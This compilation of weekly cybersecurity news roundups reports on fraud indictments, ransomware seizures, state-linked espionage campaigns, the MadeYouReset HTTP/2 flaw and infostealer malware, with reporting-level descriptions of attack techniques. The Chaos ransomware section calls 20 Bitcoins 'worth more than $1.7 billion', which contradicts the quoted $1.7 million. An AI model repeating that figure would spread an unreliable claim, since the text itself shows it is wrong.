The DoJ has charged four Ghanaian nationals, Isaac Oduro Boateng (aka “Kofi Boat”), Inusah Ahmed (aka “Pascal”), Derrick Van Yeboah (aka “Van”), and Patrick Kwame Asare (aka “Borgar”), for their roles in a $100 million fraud scheme involving romance scams and business email compromise (BEC) attacks. All four defendants allegedly belonged to a major crime ring operating globally from 2016 to 2023 and focused on targeting U.S. companies and vulnerable individuals, particularly vulnerable senior citizens who live alone.

Combining fake romance scams, spoofed emails, and forged wire transfer authorization letters, they tricked victims into wiring funds to U.S.-based contacts, who then laundered the proceeds for West African ‘chairmen’ – members of the fraud ring stationed in West Africa. Boateng and Ahmed were identified as ringleaders, while Yeboah focused on romance scams. The charges carry potential sentences of up to 20 years for each major offense.

The DoJ has also seized $1,091,453 in cryptocurrency from the BlackSuit ransomware group, tracing the funds as criminals moved them across multiple exchanges to hide their origins. The seized amount was part of a 49.3 Bitcoin ransom (worth $1.45M at the time) paid on April 4, 2023, for a decryptor. The action followed the June 2024 collection of key evidence and came soon after “Operation Checkmate”, which took down BlackSuit’s dark web extortion portals.

This week, the DOJ announced coordinated actions against the BlackSuit (Royal) ransomware group, including the takedown of servers and domains and the seizure of virtual currency. The disruption was coordinated by the FBI, @DHSgov, @SecretService, @IRS_CI and international law… pic.twitter.com/DHtSeGzlRo

— FBI (@FBI) August 14, 2025

BlackSuit, linked to Royal, Quantum, and Chaos ransomware, has been tied to over 450 attacks across U.S. critical sectors and has amassed $370M in ransom payments combined. Authorities emphasize that seizing illicit funds remains a critical component to disrupting ransomware operations, in particular hindering how actors can use their funds to maintain or rebuild infrastructure and recruit new affiliates and members.

The Bad | Cyberespionage Group Targets Georgia and Moldova with Stealthy MucorAgent Backdoor

Seemingly aligned with Russian geopolitical interests, ‘Curly COMrades’ are targeting government and judicial bodies in Georgia as well as energy firms in Moldova. The new cyberespionage group first emerged mid-last year and is known to use a custom three-stage .NET backdoor dubbed ‘MucorAgent’, which is capable of executing AES-encrypted PowerShell scripts and uploading results to a command and control (C2) server. The name derives from heavy use of curl.exe for exfiltration and COM object hijacking.

Curly COMrades achieve persistence through an uncommon method. First, it hijacks class identifiers (CLSIDs) that zero in on a Windows’ Native Image Generator (NGEN) component via a seemingly inactive scheduled task. The task runs unpredictably during idle times or system changes. Additional tools include the Go-based Resocks proxy, custom SOCKS5 servers, SSH with Stunnel, and CurlCat for obfuscated traffic relayed through compromised sites.

The group has also been observed installing legitimate remote access tools like Remote Utilities (RuRat) and commercial RMM software for interactive control. MucorAgent bypasses Windows’ Antimalware Scan Interface (AMSI), retrieves encrypted payloads disguised as PNG files, and harvests credentials by attempting NTDS database extractions and LSASS dumps. Curly COMrades implements dynamic command scheduling within MucorAgent, using in-memory decryption for secondary payloads and leveraging obfuscated .NET reflection to execute injected code, minimizing footprint and evading static analysis detection. Network reconnaissance relied on living-off-the-land binaries (netstat, wmic, ipconfig) and PowerShell AD enumeration.

While Curly COMrades employs stealthy techniques, open-source tools, and legitimate utilities to blend with normal activity, their operations generate detectable signals picked up by XDR platforms. Currently, cyber researchers suggest the attacks are part of a larger espionage campaign focused on persistence, credential theft, and data exfiltration.

The Ugly | New “MadeYouReset” Attack Technique Exploits HTTP/2 Flaw to Bypass DoS Protections

Cyber researchers have disclosed ‘MadeYouReset’, a new HTTP/2 attack technique (CVE-2025-8671) capable of bypassing the standard 100 concurrent request limit per TCP connection. This enables attackers to send thousands of requests and trigger powerful denial-of-service (DoS) conditions for legitimate users and vendors. In some implementations, the flaw can escalate to out-of-memory crashes. Affected products include Apache Tomcat (CVE-2025-48989), F5 BIG-IP (CVE-2025-54500), and Netty (CVE-2025-55163).

MadeYouReset is the latest flaw to affect HTTP/2 and builds on earlier Rapid Reset attacks (CVE-2023-44487) and its mitigations. It works by abusing the HTTP/2 RST_STREAM mechanism (used for both client cancellations and error signaling) without sending an RST_STREAM frame directly. Attackers send valid requests, then trigger carefully timed protocol violations that force the server to reset the stream while still processing the backend response. This approach bypasses Rapid Reset protections while achieving similar disruption.

Six crafted primitives can induce server resets, such as invalid WINDOW_UPDATE or PRIORITY frames, frames with illegal lengths or self-dependencies, and HEADERS or DATA frames sent after the stream is closed. The technique exploits mismatches between HTTP/2 specifications and actual server architectures, leading to resource exhaustion.

According to CERT Coordination Center (CERT/CC), this vulnerability stems from server-triggered Rapid Reset behaviors, allowing attackers to overwhelm server resources and deny service to legitimate users. Researchers also warn that MadeYouReset highlights the growing complexity of protocol abuse and the need for defenses against subtle, specification-compliant exploits.

Given HTTP/2’s critical role in web infrastructure, researchers stress that patching affected products and refining protocol-level defenses is essential to prevent large-scale exploitation of this emerging threat.

The Good | U.S. Indicts Tax Fraud Phisher & Cryptomixer Founders for Laundering Millions

Nigerian-based Chukwuemeka Victor Amachukwu was extradited this week from France to the U.S. to face multiple charges including identity theft, wire fraud, and hacking. Between 2019 and 2021, Amachukwu and his co-conspirators launched spear phishing attacks on U.S. tax preparation businesses, stealing personal data used to file fraudulent IRS tax returns and SBA loan applications.

The schemes netted over $3.3 million, with $2.5 million in stolen tax refunds and $819,000 from fake SBA loans. Separately, Amachukwu ran a bogus investment scheme involving fictitious standby letters of credit. Victims were misled into investing millions, which he pocketed. He currently faces six charges, with potential a sentence up to 20 years per wire fraud count plus a mandatory two years for identity theft while the U.S. is seeking forfeiture of all illicit gains.

Samourai Wallet founders Keonne Rodriguez and William Lonergan Hill have both pleaded guilty to laundering over $200 million in criminal proceeds through their cryptocurrency mixing service. From 2015 to 2024, their tools, Whirlpool and Ricochet, enabled anonymous Bitcoin transactions to process over 80,000 BTC linked to breaches, spear phishing schemes, dark web markets, and DeFi-related fraud. Rodriguez and Hill promoted Samourai as a means to conceal illicit funds, even advising hackers to use it.

They were arrested in April 2024 and charged with operating an unlicensed money-transmitting business and money laundering, facing up to 25 years in prison. So far, both have agreed to forfeit over $237 million as Samourai’s domains and servers were seized and its app removed from the Google Play Store. The mixing services reportedly generated more than $6 million in fees by intentionally helping criminals obfuscate their financial tracks.

The Bad | Fake Trading Bots on YouTube Drain $900K in Crypto via Malicious Smart Contracts

A new report from SentinelLABS uncovers a widespread cryptocurrency scam campaign using malicious smart contracts disguised as trading bots to steal funds. Distributed through aged and seemingly credible YouTube accounts, these scams have already drained over $900,000 USD from victims since early 2024.

The contracts are written on the Remix Solidity Compiler platform and hide attacker-controlled wallet addresses through obfuscation techniques like XOR encoding, string concatenation, and large number conversion. Victims are tricked into funding these contracts and unknowingly transferring funds to the attacker. Once funded, the contracts redirect ETH to hidden attacker-controlled wallets using embedded logic.

The scam videos often feature AI-generated narrators that are easier and cheaper to produce scams at scale and heavily managed comment sections to fake legitimacy. Accounts like @Jazz_Braze and @SolidityTutorials have all posted highly-viewed tutorials with no obvious signs of malicious intent, while some scams were spread through unlisted videos shared via Telegram.

Scams in this campaign have seen varied success. While some generate a few thousand dollars, one video called “How to Create Passive Income MEV Bot” funneled over $900,000 USD to a single attacker address. The account behind that video had been populated with entertainment shorts over many months, likely to build ranking. The video remains unlisted and is likely shared via other social platforms.

Given the ease of generating AI content and purchasing aged YouTube accounts, the crypto scam ecosystem is increasingly accessible to attackers. SentinelLABS urges crypto users to avoid deploying code promoted by influencer content and to thoroughly validate any tools before use. If a trading bot promises easy profit without transparency, it’s likely a scam – especially in the volatile world of crypto.

The Ugly | Attackers Exploit Possible SonicWall Zero-Day to Deploy Akira Ransomware in Firewalls

SonicWall is investigating a potential zero-day vulnerability after a surge in Akira ransomware attacks targeting its Gen 7 firewalls where SSLVPN is enabled. Multiple incidents have been reported both internally and externally, prompting SonicWall to post guidance for users to disable SSLVPNs where possible, limit SSLVPN access to trusted IPs, enforce MFA, update passwords, and remove inactive accounts. While disabling VPNs may not be feasible for all users, the network security company recommends initiating incident response measures immediately.

Security researchers observed attackers exploiting SonicWall firewalls to access networks, pivoting quickly to domain controllers, disabling Microsoft Defender, and deploying Akira ransomware. The attacks, beginning in late July, have involved tools like AnyDesk, ScreenConnect, and SSH. All confirmed incidents are linked to Akira, with some attackers failing to encrypt systems but gaining unauthorized access.

The suspected vulnerability appears to affect firmware versions 7.2.0-7015 and earlier, particularly on TZ and NSa-series devices. Other researchers posit that a zero-day is likely in play, as attacks have succeeded even with MFA enabled.

The latest updates on the attacks further reveal that Akira affiliates use a Bring Your Own Vulnerable Driver (BYOVD) technique, exploiting Windows drivers like rwdrv.sys and hlpdrv.sys to disable antivirus protection. These drivers enable attackers to manipulate Windows Defender settings and achieve kernel-level access. Additionally, Akira threat actors use SEO poisoning to lure IT professionals to trojanized installers, which deploy Bumblebee malware, enabling remote access, credential theft, and eventual ransomware deployment.

Since emerging in March 2023, Akira has compromised over 250 victims and extorted an estimated $42 million through targeted ransomware campaigns.

The Good | FBI Seizes Chaos Ransomware Bitcoin as CISA Launches Thorium for Scalable Malware Analysis

Over 20 Bitcoins, worth more than $1.7 billion, are now in the possession of the FBI, following their seizure of a cryptocurrency wallet belonging to a Chaos ransomware affiliate named “Hors”. The funds have since been traced to ransomware payments, resulting in the U.S. Department of Justice filing a civil forfeiture complaint to permanently claim the assets.

Today, FBI Dallas made public the seizure of over $1.7 million worth of cryptocurrency as part of ongoing efforts to combat ransomware. The seized funds were traced to a cryptocurrency address allegedly associated with a member of the Chaos ransomware group, known as “Hors,” who… pic.twitter.com/uWeIMMGE9J

— FBI Dallas (@FBIDallas) July 28, 2025

Chaos ransomware is considered a rebrand of the BlackSuit group as well as a partial-successor to the defunct Conti gang, but unrelated to any older, low-tier Chaos variants. Security researchers have tied the new Chaos operation to BlackSuit based on its tools, encryption, and ransom notes. The FBI’s Bitcoin seizure follows law enforcement’s takedown of BlackSuit’s dark web infrastructure, which likely exposed the wallet connected to Hors.

From CISA this week, an open-source platform named “Thorium” was publicly released with the goal of helping government, private sector, and research teams automate malware and forensic investigations. Thorium was developed in conjunction with Sandia National Laboratories and can process over 10 million files per hour in addition to handling 1,700 tasks per second per permission group. This streamlines complex incident response and malware analysis workflows.

Thorium works by integrating commercial, open-source, and custom tools as Docker images, supports secure group-based permissions, and scales with Kubernetes and ScyllaDB to meet workload demands. Security teams can use it to tag and search results, share tools, and automate large-scale binary and digital artifact analysis.

The platform is available on CISA’s GitHub, joining recent public tools like the Eviction Strategies Tool and Malware Next-Gen, all furthering CISA’s mission to strengthen collective cyber defense capabilities.

The Bad | SentinelLABS Uncovers Patents Exposing Hafnium’s Expansive MSS-Linked Capabilities

SentinelLABS has identified more than ten patents for advanced forensics and data collection tools tied to the Chinese state-linked threat actor, Hafnium, highlighting the complexity of China’s cyber contracting ecosystem. Hafnium’s capabilities, many of which were previously unreported, include acquisition of encrypted endpoint data, mobile forensics, router and network traffic collection, and specialized software for decrypting hard drives.

The findings build on the DoJ’s indictment of two hackers: Xu Zewei and Zhang Yu, as well as the U.S. Treasury’s sanction of Yin Kecheng and Zhou Shuai. Xu and Zhang allegedly worked under the Shanghai State Security Bureau (SSSB) via Shanghai Powerock and Shanghai Firetech, while Yin and Zhou operated through Shanghai Heiying and the broker firm i-Soon. This tiered contractor model shows how the Ministry of State Security (MSS) leverages private firms for offensive cyber operations, sometimes spanning multiple regions beyond Shanghai.

Hafnium (aka Silk Typhoon) first rose to prominence in 2021 for exploiting Microsoft Exchange Server (MES) zero-days, which led to opportunistic attacks by other Chinese groups and the first ever joint statement from the U.S., U.K., and E.U. Subsequent research and leaked i-Soon chats revealed a layered ecosystem with low-tier contractors like i-Soon, mid-tier firms like Chengdu 404, and elite outfits like Firetech that are trusted with direct MSS tasks.

The 10+ patents filed by Shanghai Firetech suggest the company possesses far broader capabilities than publicly attributed to Hafnium. These tools may support human intelligence (HUMINT)-style close access operations and could have been provided to other MSS regional offices, complicating attribution. The findings, as a whole, show that threat actor labels track activity clusters, while true attribution requires tracing operations back to the people and companies executing them.

The Ugly | Secret Blizzard Exploits ISP-Level Access & SORM to Spy on Moscow Diplomatic Missions

Secret Blizzard (aka Turla or Waterbug) is conducting cyber-espionage operations against diplomatic missions in Moscow. Researchers note that the Russian Federal Security Service (FSB)-linked group is exploiting an adversary-in-the-middle (AiTM) position at the internet service provider (ISP) level in order to leverage Russia’s SORM surveillance system to intercept traffic and deploy custom ApolloShadow malware.

Attackers have been observed redirecting victims to captive portals where they are prompted to download a malware-laced antivirus installer. Once executed, ApolloShadow installs a forged trusted root certificate masquerading as Kaspersky anti-virus, enabling the compromise of encrypted connections and the long-term monitoring of diplomatic networks. This allows Secret Blizzard to spoof legitimate sites, decrypt traffic, and maintain persistent access to diplomatic and governmental networks. Researchers found this to be the first observed instance of Secret Blizzard conducting ISP-level espionage with special focus on targeting foreign embassies, diplomatic entities, and sensitive organizations in Moscow that rely on local providers.

While discovered in February 2025, the campaign has been active since at least 2024. It also represents a high-risk threat to embassies and sensitive organizations in Moscow. By combining network-level interception, certificate forgery, and custom malware delivery, Secret Blizzard achieves long-term surveillance and intelligence collection without relying on traditional spear-phishing or direct network intrusion.

Secret Blizzard, linked to Russia’s FSB Center 16, is one of the longest-operating advanced persistent threats (APTs), active since the 1990s, and responsible for global campaigns targeting embassies, defense organizations, and research institutions. This latest campaign demonstrates the group’s adaptability and sophistication, using local ISP-level access and Russia’s domestic surveillance ecosystem to maintain covert, long-term access for intelligence gathering against high-profile diplomatic targets.

The Good | Authorities Dismantle XSS.is Cybercrime Forum & Release Free Phobos/8Base Decryptor

After a 12-year long run, XSS[.]is (formerly DaMaGeLaB) faced major disruptions this week with the arrest of its suspected administrator as part of a joint operation led by French and Ukrainian authorities. The Russian-speaking cybercrime forum had been active since 2013 with nearly 50,000 users and acted as a popular hub for stolen data, hacking tools, and ransomware services. Authorities also seized its clearnet domain.

The suspected administrator, also linked to the private messaging site thesecure[.]biz, is believed to have earned over €7 million from advertising and facilitating criminal transactions. Europol reports that the admin had been active in the cybercrime scene for nearly 20 years, maintaining their ties to prominent cybercriminal groups over the decades. XSS[.]is also featured an escrow system and encrypted communications, reinforcing its reputation as a key platform for non-Russian-targeted cyberattacks alongside other forums like Exploit.

Japanese police have released a free decryptor for Phobos and 8Base ransomware victims, allowing those affected to recover their encrypted files. Phobos, active since 2018, operated as a ransomware-as-a-service (RaaS) platform while 8Base launched in 2023 using modified encryptors with double extortion tactics. A major international crackdown on Phobos last year led to the arrest of key members and the seizure of 27 servers, enabling creation of the decryptor.

The decryptor is available on the Japanese police’s website with instructions in English and on Europol’s NoMoreRansom portal. It supports extensions like .phobos, .8base, .elbie, .faust, and .LIZARD, but law enforcement say that it may also work with others. Users are encouraged to test it, as it may decrypt additional variants.

The Bad | Lumma MaaS Rebuilds Operations After Takedown, Evading Detection with New Tactics

After major law enforcement action taken back in May, Lumma infostealer operations are steadily regaining momentum despite disruptions to its infrastructure. Although the takedown significantly impacted the malware-as-a-service (MaaS) platform, Lumma never fully shut down. Its operators quickly addressed the disruption on cybercrime forums, asserting that their central server had not been seized (though it was remotely wiped) and that restoration was already underway.

To date, security researchers note that Lumma is nearly back to pre-takedown levels, with telemetry data confirming a rapid rebuilding of its infrastructure. Latest updates to this second wind include a shift from Cloudflare to Russian-based provider Selectel, presumably to evade future takedowns. However, the MaaS continues to use legitimate cloud infrastructure to disguise malicious activity.

Lumma has resumed their operations through four main channels. First, fake software cracks and key generators are being promoted via malvertising, leading users to deceptive sites that fingerprint devices using Traffic Detection Systems (TDS). Using ClickFix, Lumma is using compromised websites that now display fake CAPTCHA pages to trick visitors into executing PowerShell commands, which inject Lumma directly into system memory to avoid file-based detection.

Another distribution method involves Lumma attackers setting up GitHub repositories filled with AI-generated content advertising fake game cheats with the Lumma payload is hidden in executables or ZIP archives. Finally, YouTube videos and Facebook posts advertise cracked software, linking to external download sites. Some of these are hosted on trusted platforms like sites.google.com to lend credibility.

Lumma’s re-emergence reflects how infrastructure seizures alone are insufficient. Without arrests or indictments, the cyber war machine keeps turning, and threat actors will continue to treat such takedowns as temporary disruptions to an otherwise profitable enterprise.

The Ugly | CISA Orders Urgent SharePoint Patching As Microsoft Confirms ToolShell Exploits

Last weekend, Microsoft confirmed active exploitation of a zero-day vulnerability in on-premises SharePoint Servers, dubbed “ToolShell” (CVE-2025-53770), along with a bypass variant tracked as CVE-2025-53771. These flaws, along with earlier patched bugs (CVE-2025-49704/49706), form an unauthenticated RCE chain that focus on exploiting the /ToolPane.aspx URI via a crafted POST request. Emergency patches have been released for SharePoint Subscription Edition and Server 2019, with updates for 2016 pending.

While the initial wave of attacks were initially targeted, broader exploitation is expected as PoC code circulates. SentinelOne’s report on the attacks noted actors setting up honeypots and sharing tooling, signaling growing threat actor interest. Now, CISA has added the CVEs to its KEV catalog, citing confirmed exploitation, and ordered federal agencies to remediate affected systems immediately. Microsoft has since linked the ToolShell attacks to suspected China-based threat actors, including Linen Typhoon and Violet Typhoon, who began targeting on-premises SharePoint servers as early as July 7.

Update: See newly added info to our #ToolShell Alert. We’ve included info on ransomware deployment, new webshells involved in exploitation, & detection guidance https://t.co/Y37FHSeAL0 pic.twitter.com/C5aMXNOmAU

— CISA Cyber (@CISACyber) July 24, 2025

Given the severity of ToolShell, organizations are strongly advised to adopt a layered defense strategy. Key recommendations include isolating on-prem SharePoint servers from public internet access to reduce exposure, enabling Antimalware Scan Interface (AMSI) in full mode to support endpoint detection, and applying Microsoft’s latest patches without delay. Detection should also be enhanced by integrating ToolShell-specific indicators of compromise (IOCs) into EDR/XDR and SIEM systems, and deploying custom rules to monitor SharePoint directories such as `LAYOUTS`.

CISA is continuing to coordinate with Microsoft, federal agencies, and local partners to assess the full scope of impact. So far, approximately 400 organizations, including government agencies, have reportedly been compromised, pointing to the urgent need for rapid mitigation.

The Good | Cybercriminals Face Disruptions Across Ransom, DDoS & Extortion Campaigns

Cameron John Wagenius, a 21-year-old former U.S. Army soldier, has pleaded guilty to attacking and extorting at least ten U.S. telecom and tech companies, including AT&T and Verizon. Operating under aliases like “kiberphant0m” and “’cyb3rph4nt0m”, he used tools like SSH Brute and SIM-swapping techniques to steal credentials and demand ransoms of up to $1 million from the breached firms.

Active on forums such as BreachForums and XSS, Wagenius conspired with other actors between 2023 and 2024, including the Snowflake cyberattacks and even while serving in the military. In one instance, he threatened to leak over 358GB of stolen data and, in another, sought $500,000 in cryptocurrency from a victim company. Wagneius was arrested in December 2024 and indicted this week, and now faces up to 27 years in prison with sentencing scheduled for October 6.

Europol-led “Operation Elicius” has dismantled a Romanian-based ransomware gang called “Diskstation” that recently targeted Synology Network-Attached Storage (NAS) devices, encrypting data and disrupting businesses, including NGOs and media firms, in Italy’s Lombardy region. The group, active since 2021 under multiple aliases, demanded ransoms from $10,000 to hundreds of thousands in cryptocurrency. One man, suspected to be the primary operator of the attacks, was also arrested in Bucharest following international raids.

In another global operation dubbed “Eastwood”, law enforcement came together to target pro-Russian hacktivist group “NoName057(16)”, responsible for widespread DDoS attacks across Europe, Israel, and Ukraine. As part of the collaborative effort, authorities seized over 100 servers, issued seven arrest warrants, and detained two suspects. The operation was successful in disrupting the group’s infrastructure, but key members remain in Russia, and future attacks on European entities by the gang are still expected to persist.

The Bad | Katz Stealer MaaS Gains Traction, Stealing Sensitive Info Via Multi-Stage Infection Chains

A new report from SentinelLABS this week breaks down Katz Stealer, a sophisticated infostealer operating as Malware-as-a-Service (MaaS), launched in early 2025 and widely adopted by cybercriminals due to its ease of use, customizable features, and powerful capabilities. Marketed on Telegram, Discord, and web forums, it offers a web-based panel for affiliates to create custom payloads, manage stolen data, and configure attacks.

Katz employs a stealthy multi-stage infection chain that begins with phishing emails or trojanized downloads. A JavaScript dropper launches PowerShell commands to retrieve a steganographically embedded payload from a decoy image. It uses UAC bypasses, process hollowing, and scheduled tasks to achieve persistence and execute with elevated privileges, often hiding in legitimate processes like MSBuild.exe.

Once active, Katz Stealer focuses on harvesting data from browsers, messaging platforms, gaming services, email clients, VPNs, and cryptocurrency wallets. It bypasses modern browser protections such as Google’s Application Bound Encryption (ABE) by extracting master decryption keys and decrypting sensitive data in memory.

The malware also targets wallet extensions, clipboard data, and system files, sending stolen information back to hardcoded command-and-control (C2) servers via HTTP. The C2 infrastructure is IP-based, and Katz maintains persistence for ongoing data exfiltration. Attackers can also remotely wipe traces after data theft is complete.

Despite its advanced capabilities, Katz Stealer still relies heavily on user interaction, making training and awareness on social engineering and detection critical for prevention. SentinelOne Singularity detects and blocks Katz Stealer through real-time analysis of malicious behaviors, process injections, and network activity, ensuring systems remain protected from this evolving infostealer threat.

The Ugly | DPRK-Based Actors Expand On Contagious Interview npm Malware Campaign

North Korean threat actors behind the ongoing Contagious Interview campaign have published 67 new malicious packages to the npm registry, continuing their efforts to compromise the software supply chain. Cyber researchers observed that these packages – downloaded over 17,000 times – feature a new malware loader dubbed “XORIndex”, which builds on earlier campaigns distributing another loader called HexEval.

Contagious Interview is known for targeting software developers through fake coding assignments or poisoned open-source packages. The goal is to infect machines and extract sensitive data, particularly from developers at organizations of interest. This campaign aligns with North Korea’s broader strategy of exploiting remote IT roles to gain unauthorized access to global networks.

These npm packages serve as initial access vectors for BeaverTail, a JavaScript-based infostealer that targets web browsers and cryptocurrency wallets, and may also deploy the Python backdoor InvisibleFerret. XORIndex, like HexEval, profiles the victim’s machine and communicates with hardcoded C2 servers to exfiltrate system information and launch follow-on payloads.

Researchers observed that XORIndex has evolved from a simple loader into a more advanced tool with basic system reconnaissance capabilities. Meanwhile, attackers are rotating aliases and package names to evade detection, creating a “whack-a-mole” scenario for defenders.

The campaign continues to rotate npm maintainer aliases and reuse core malware components, making detection difficult. XORIndex alone has seen over 9,000 downloads since June 2025. Despite ongoing takedown efforts, the attackers adapt quickly with new variants. The malware is deployed using a consistent playbook with small variations, allowing the threat actors to maintain persistence despite ongoing takedown efforts, highlighting the growing need for vigilance across developer ecosystems.